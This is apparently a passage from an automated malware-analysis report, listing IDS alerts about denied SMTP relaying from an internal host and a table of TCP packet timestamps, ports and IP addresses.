08/24/21-08:48:03.777918	TCP	567	POLICY SMTP relaying denied	25	49848	104.47.14.33	192.168.2.7
08/24/21-08:48:03.953797	TCP	567	POLICY SMTP relaying denied	25	49851	104.47.17.161	192.168.2.7
08/24/21-08:48:03.956912	TCP	567	POLICY SMTP relaying denied	25	49850	104.47.17.161	192.168.2.7
08/24/21-08:48:03.963824	TCP	567	POLICY SMTP relaying denied	25	49849	104.47.17.161	192.168.2.7
08/24/21-08:48:04.127690	TCP	567	POLICY SMTP relaying denied	25	49852	104.47.17.161	192.168.2.7
08/24/21-08:48:04.296956	TCP	567	POLICY SMTP relaying denied	25	49855	104.47.14.33	192.168.2.7
08/24/21-08:48:04.338413	TCP	567	POLICY SMTP relaying denied	25	49854	104.47.13.33	192.168.2.7
08/24/21-08:48:04.775224	TCP	567	POLICY SMTP relaying denied	25	49853	104.47.73.161	192.168.2.7
08/24/21-08:48:05.102378	TCP	567	POLICY SMTP relaying denied	25	49857	104.47.73.161	192.168.2.7
08/24/21-08:48:05.256888	TCP	567	POLICY SMTP relaying denied	25	49862	104.47.17.161	192.168.2.7
08/24/21-08:48:05.264970	TCP	567	POLICY SMTP relaying denied	25	49863	104.47.17.161	192.168.2.7
08/24/21-08:48:05.495787	TCP	567	POLICY SMTP relaying denied	25	49865	104.47.17.161	192.168.2.7
08/24/21-08:48:05.704106	TCP	567	POLICY SMTP relaying denied	25	49867	104.47.17.161	192.168.2.7
08/24/21-08:48:05.939080	TCP	567	POLICY SMTP relaying denied	25	49864	104.47.56.33	192.168.2.7
08/24/21-08:48:06.263460	TCP	567	POLICY SMTP relaying denied	25	49868	104.47.17.161	192.168.2.7
08/24/21-08:48:06.380594	TCP	567	POLICY SMTP relaying denied	25	49870	104.47.17.161	192.168.2.7
08/24/21-08:48:06.773372	TCP	567	POLICY SMTP relaying denied	25	49873	104.47.14.33	192.168.2.7
08/24/21-08:48:06.910433	TCP	567	POLICY SMTP relaying denied	25	49871	104.47.70.33	192.168.2.7
08/24/21-08:48:07.171738	TCP	567	POLICY SMTP relaying denied	25	49876	104.47.17.161	192.168.2.7
08/24/21-08:48:07.340850	TCP	567	POLICY SMTP relaying denied	25	49875	104.47.70.33	192.168.2.7
08/24/21-08:48:07.423390	TCP	567	POLICY SMTP relaying denied	25	49878	104.47.17.161	192.168.2.7
08/24/21-08:48:07.858221	TCP	567	POLICY SMTP relaying denied	25	49879	104.47.70.33	192.168.2.7
08/24/21-08:48:08.051296	TCP	567	POLICY SMTP relaying denied	25	49880	104.47.56.33	192.168.2.7
08/24/21-08:48:08.417477	TCP	567	POLICY SMTP relaying denied	25	49882	104.47.73.161	192.168.2.7
08/24/21-08:48:08.589602	TCP	567	POLICY SMTP relaying denied	25	49885	104.47.13.33	192.168.2.7
08/24/21-08:48:08.615280	TCP	567	POLICY SMTP relaying denied	25	49884	104.47.70.33	192.168.2.7
08/24/21-08:48:08.865468	TCP	567	POLICY SMTP relaying denied	25	49889	104.47.18.161	192.168.2.7
08/24/21-08:48:08.989429	TCP	567	POLICY SMTP relaying denied	25	49887	104.47.70.33	192.168.2.7
08/24/21-08:48:09.335053	TCP	567	POLICY SMTP relaying denied	25	49888	104.47.73.33	192.168.2.7
08/24/21-08:48:09.445267	TCP	567	POLICY SMTP relaying denied	25	49890	104.47.70.33	192.168.2.7
08/24/21-08:48:10.136276	TCP	567	POLICY SMTP relaying denied	25	49891	104.47.73.33	192.168.2.7
08/24/21-08:48:10.461911	TCP	567	POLICY SMTP relaying denied	25	49893	104.47.70.33	192.168.2.7
08/24/21-08:48:10.694036	TCP	567	POLICY SMTP relaying denied	25	49897	104.47.70.33	192.168.2.7
08/24/21-08:48:11.006471	TCP	567	POLICY SMTP relaying denied	25	49898	104.47.70.33	192.168.2.7
08/24/21-08:48:11.533886	TCP	567	POLICY SMTP relaying denied	25	49900	104.47.73.33	192.168.2.7
08/24/21-08:48:11.556456	TCP	567	POLICY SMTP relaying denied	25	49901	173.194.69.26	192.168.2.7
08/24/21-08:48:11.624953	TCP	567	POLICY SMTP relaying denied	25	49902	104.47.70.33	192.168.2.7
08/24/21-08:48:12.136400	TCP	567	POLICY SMTP relaying denied	25	49904	104.47.70.33	192.168.2.7
08/24/21-08:48:12.321879	TCP	567	POLICY SMTP relaying denied	25	49906	104.47.70.33	192.168.2.7
08/24/21-08:48:12.971706	TCP	567	POLICY SMTP relaying denied	25	49909	104.47.73.33	192.168.2.7
08/24/21-08:48:13.118218	TCP	567	POLICY SMTP relaying denied	25	49908	104.47.73.161	192.168.2.7
08/24/21-08:48:13.522204	TCP	567	POLICY SMTP relaying denied	25	49913	104.47.70.33	192.168.2.7
08/24/21-08:48:13.630386	TCP	567	POLICY SMTP relaying denied	25	49914	104.47.70.33	192.168.2.7
08/24/21-08:48:14.157288	TCP	567	POLICY SMTP relaying denied	25	49916	104.47.73.33	192.168.2.7
08/24/21-08:48:14.160433	TCP	567	POLICY SMTP relaying denied	25	49917	104.47.70.33	192.168.2.7
08/24/21-08:48:14.391186	TCP	567	POLICY SMTP relaying denied	25	49920	104.47.14.33	192.168.2.7
08/24/21-08:48:14.835850	TCP	567	POLICY SMTP relaying denied	25	49921	104.47.73.33	192.168.2.7
08/24/21-08:48:14.841222	TCP	567	POLICY SMTP relaying denied	25	49922	104.47.73.33	192.168.2.7
08/24/21-08:48:14.916094	TCP	567	POLICY SMTP relaying denied	25	49923	104.47.70.33	192.168.2.7
08/24/21-08:48:15.161700	TCP	567	POLICY SMTP relaying denied	25	49924	104.47.70.33	192.168.2.7
08/24/21-08:48:15.375345	TCP	567	POLICY SMTP relaying denied	25	49927	104.47.70.33	192.168.2.7
08/24/21-08:48:15.379248	TCP	567	POLICY SMTP relaying denied	25	49925	104.47.70.33	192.168.2.7
08/24/21-08:48:15.390968	TCP	567	POLICY SMTP relaying denied	25	49926	104.47.70.33	192.168.2.7
08/24/21-08:48:15.701841	TCP	567	POLICY SMTP relaying denied	25	49928	104.47.70.33	192.168.2.7
08/24/21-08:48:16.065380	TCP	567	POLICY SMTP relaying denied	25	49930	104.47.73.33	192.168.2.7
08/24/21-08:48:16.083180	TCP	567	POLICY SMTP relaying denied	25	49931	104.47.73.33	192.168.2.7
08/24/21-08:48:16.327012	TCP	567	POLICY SMTP relaying denied	25	49934	104.47.22.161	192.168.2.7
08/24/21-08:48:16.335736	TCP	567	POLICY SMTP relaying denied	25	49932	104.47.73.33	192.168.2.7
08/24/21-08:48:16.723446	TCP	567	POLICY SMTP relaying denied	25	49935	104.47.73.33	192.168.2.7
08/24/21-08:48:16.850235	TCP	567	POLICY SMTP relaying denied	25	49936	104.47.70.33	192.168.2.7
08/24/21-08:48:17.279223	TCP	567	POLICY SMTP relaying denied	25	49939	104.47.70.33	192.168.2.7
08/24/21-08:48:17.392324	TCP	567	POLICY SMTP relaying denied	25	49940	104.47.70.33	192.168.2.7
08/24/21-08:48:18.430564	TCP	567	POLICY SMTP relaying denied	25	49943	104.47.70.33	192.168.2.7
08/24/21-08:48:18.444018	TCP	567	POLICY SMTP relaying denied	25	49942	104.47.70.33	192.168.2.7
08/24/21-08:48:19.400354	TCP	567	POLICY SMTP relaying denied	25	49946	104.47.13.33	192.168.2.7
08/24/21-08:48:19.550865	TCP	567	POLICY SMTP relaying denied	25	49945	104.47.70.33	192.168.2.7
08/24/21-08:48:20.848577	TCP	567	POLICY SMTP relaying denied	25	49948	104.47.73.161	192.168.2.7
08/24/21-08:48:20.856741	TCP	567	POLICY SMTP relaying denied	25	49949	104.47.73.161	192.168.2.7
08/24/21-08:48:21.385207	TCP	567	POLICY SMTP relaying denied	25	49951	104.47.70.33	192.168.2.7
08/24/21-08:48:21.386241	TCP	567	POLICY SMTP relaying denied	25	49950	104.47.70.33	192.168.2.7
08/24/21-08:48:21.669836	TCP	567	POLICY SMTP relaying denied	25	49953	104.47.22.161	192.168.2.7
08/24/21-08:48:22.022745	TCP	567	POLICY SMTP relaying denied	25	49952	104.47.73.33	192.168.2.7
08/24/21-08:48:22.292370	TCP	567	POLICY SMTP relaying denied	25	49944	74.125.200.27	192.168.2.7
08/24/21-08:48:22.308347	TCP	567	POLICY SMTP relaying denied	25	49954	104.47.73.33	192.168.2.7
08/24/21-08:48:22.564202	TCP	567	POLICY SMTP relaying denied	25	49955	104.47.70.33	192.168.2.7
08/24/21-08:48:22.903673	TCP	567	POLICY SMTP relaying denied	25	49957	104.47.73.33	192.168.2.7
08/24/21-08:48:22.914504	TCP	567	POLICY SMTP relaying denied	25	49956	104.47.73.33	192.168.2.7
08/24/21-08:48:23.183803	TCP	567	POLICY SMTP relaying denied	25	49958	104.47.73.33	192.168.2.7
08/24/21-08:48:23.406858	TCP	567	POLICY SMTP relaying denied	25	49959	104.47.70.33	192.168.2.7
08/24/21-08:48:23.695868	TCP	567	POLICY SMTP relaying denied	25	49960	104.47.70.33	192.168.2.7
08/24/21-08:48:24.338153	TCP	567	POLICY SMTP relaying denied	25	49965	104.47.1.33	192.168.2.7
08/24/21-08:48:24.525275	TCP	567	POLICY SMTP relaying denied	25	49962	104.47.73.33	192.168.2.7
08/24/21-08:48:24.902836	TCP	567	POLICY SMTP relaying denied	25	49967	104.47.70.33	192.168.2.7
08/24/21-08:48:25.072775	TCP	567	POLICY SMTP relaying denied	25	49968	104.47.70.33	192.168.2.7
08/24/21-08:48:25.407878	TCP	567	POLICY SMTP relaying denied	25	49970	104.47.70.33	192.168.2.7
08/24/21-08:48:25.593605	TCP	567	POLICY SMTP relaying denied	25	49973	104.47.14.33	192.168.2.7
08/24/21-08:48:25.696409	TCP	567	POLICY SMTP relaying denied	25	49971	104.47.73.33	192.168.2.7
08/24/21-08:48:25.783068	TCP	567	POLICY SMTP relaying denied	25	49975	104.47.14.33	192.168.2.7
08/24/21-08:48:26.140675	TCP	567	POLICY SMTP relaying denied	25	49977	104.47.18.225	192.168.2.7
08/24/21-08:48:26.368827	TCP	567	POLICY SMTP relaying denied	25	49976	104.47.58.33	192.168.2.7
08/24/21-08:48:26.775043	TCP	567	POLICY SMTP relaying denied	25	49979	104.47.73.33	192.168.2.7
08/24/21-08:48:26.918729	TCP	567	POLICY SMTP relaying denied	25	49981	173.194.69.26	192.168.2.7
08/24/21-08:48:26.961683	TCP	567	POLICY SMTP relaying denied	25	49983	104.47.18.225	192.168.2.7
08/24/21-08:48:26.986459	TCP	567	POLICY SMTP relaying denied	25	49964	104.47.22.161	192.168.2.7
08/24/21-08:48:27.082797	TCP	567	POLICY SMTP relaying denied	25	49982	104.47.73.33	192.168.2.7
08/24/21-08:48:27.576494	TCP	567	POLICY SMTP relaying denied	25	49985	104.47.18.225	192.168.2.7
08/24/21-08:48:27.642772	TCP	567	POLICY SMTP relaying denied	25	49986	104.47.22.161	192.168.2.7
08/24/21-08:48:28.119021	TCP	567	POLICY SMTP relaying denied	25	49990	104.47.18.225	192.168.2.7
08/24/21-08:48:28.331200	TCP	567	POLICY SMTP relaying denied	25	49992	104.47.18.225	192.168.2.7
08/24/21-08:48:28.358564	TCP	567	POLICY SMTP relaying denied	25	49988	104.47.73.33	192.168.2.7
08/24/21-08:48:28.700121	TCP	567	POLICY SMTP relaying denied	25	49996	104.47.18.225	192.168.2.7
08/24/21-08:48:28.703882	TCP	567	POLICY SMTP relaying denied	25	49994	104.47.9.33	192.168.2.7
08/24/21-08:48:29.346922	TCP	567	POLICY SMTP relaying denied	25	49998	104.47.73.33	192.168.2.7
08/24/21-08:48:29.354634	TCP	567	POLICY SMTP relaying denied	25	49997	104.47.73.33	192.168.2.7
08/24/21-08:48:29.702862	TCP	567	POLICY SMTP relaying denied	25	50001	104.47.9.33	192.168.2.7
08/24/21-08:48:29.790625	TCP	567	POLICY SMTP relaying denied	25	49995	142.250.150.26	192.168.2.7
08/24/21-08:48:30.093574	TCP	567	POLICY SMTP relaying denied	25	50004	104.47.18.225	192.168.2.7
08/24/21-08:48:30.302996	TCP	567	POLICY SMTP relaying denied	25	50006	104.47.18.225	192.168.2.7
08/24/21-08:48:30.304677	TCP	567	POLICY SMTP relaying denied	25	50002	104.47.73.33	192.168.2.7
08/24/21-08:48:30.969779	TCP	567	POLICY SMTP relaying denied	25	50007	104.47.73.33	192.168.2.7
08/24/21-08:48:32.180019	TCP	567	POLICY SMTP relaying denied	25	50011	173.194.69.26	192.168.2.7

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 24, 2021 08:46:30.566019058 CEST	49709	80	192.168.2.7	95.213.224.6
Aug 24, 2021 08:46:33.575787067 CEST	49709	80	192.168.2.7	95.213.224.6
Aug 24, 2021 08:46:39.630494118 CEST	49709	80	192.168.2.7	95.213.224.6
Aug 24, 2021 08:46:42.511897087 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.535989046 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.539037943 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.539068937 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.539073944 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.569147110 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.571423054 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.627724886 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.627768993 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.627796888 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.627825022 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.627854109 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.627881050 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.627888918 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.627908945 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.627938032 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.627966881 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.627975941 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.627984047 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.627995968 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.627996922 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.628067970 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.650511980 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.650548935 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.650587082 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.650612116 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.650639057 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.650660992 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.650687933 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.650712013 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.650737047 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.650746107 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.650765896 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.650768995 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.650794029 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.650795937 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.650819063 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.650825024 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.650845051 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.650870085 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.650875092 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.650892973 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.650921106 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.650922060 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.650945902 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.650966883 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.650969028 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.650996923 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.651024103 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.651025057 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.651072979 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.676105976 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.677887917 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.677921057 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.677949905 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.677974939 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.678009033 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.678039074 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.678081036 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.678112030 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.678139925 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.678169966 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.678200006 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.678229094 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.692600965 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.692627907 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.692630053 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.692631960 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.695910931 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.695975065 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.696001053 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.696033955 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.696068048 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.696082115 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.696098089 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.696101904 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.696150064 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.696187019 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.696211100 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.696291924 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.696291924 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.696324110 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.696346998 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.696356058 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.696386099 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.696408987 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.696433067 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.696463108 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.696485043 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.696492910 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.696522951 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.696552038 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.696582079 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.696589947 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.696609974 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.696640015 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.696643114 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.696671009 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.696674109 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.696701050 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.696728945 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.696732044 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.696768999 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.696789980 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.696799994 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.696829081 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.696850061 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.696858883 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.696906090 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.722460985 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.722517014 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.722580910 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.722611904 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.722640991 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.722693920 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.722726107 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.722754002 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.722784996 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.722918987 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.722950935 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.722980976 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.723009109 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.723037004 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.723064899 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.723093987 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.723139048 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.723167896 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.723196030 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.723223925 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.723252058 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.723278999 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.723304987 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.723334074 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.723361969 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.723391056 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.723418951 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.723447084 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.723474979 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.723501921 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.723531008 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.723558903 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.723587036 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.723615885 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.723644972 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.723673105 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.723716974 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.723745108 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.723771095 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.723794937 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.723819017 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.723850012 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.723875999 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.723905087 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.723932981 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.723961115 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.723989010 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.724016905 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.732063055 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.762130022 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.762213945 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.762254000 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.762283087 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.762310982 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.762339115 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.762367010 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.762393951 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.762422085 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.762443066 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.762459993 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.762461901 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.762474060 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.762481928 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.762500048 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.762518883 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.762537003 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.762556076 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.762576103 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.762595892 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.762607098 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:42.762614965 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.762634039 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.762653112 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.762672901 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.762692928 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.762712002 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.762731075 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.762749910 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.762768984 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.762787104 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.762804985 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:42.762823105 CEST	80	49715	212.224.105.79	192.168.2.7
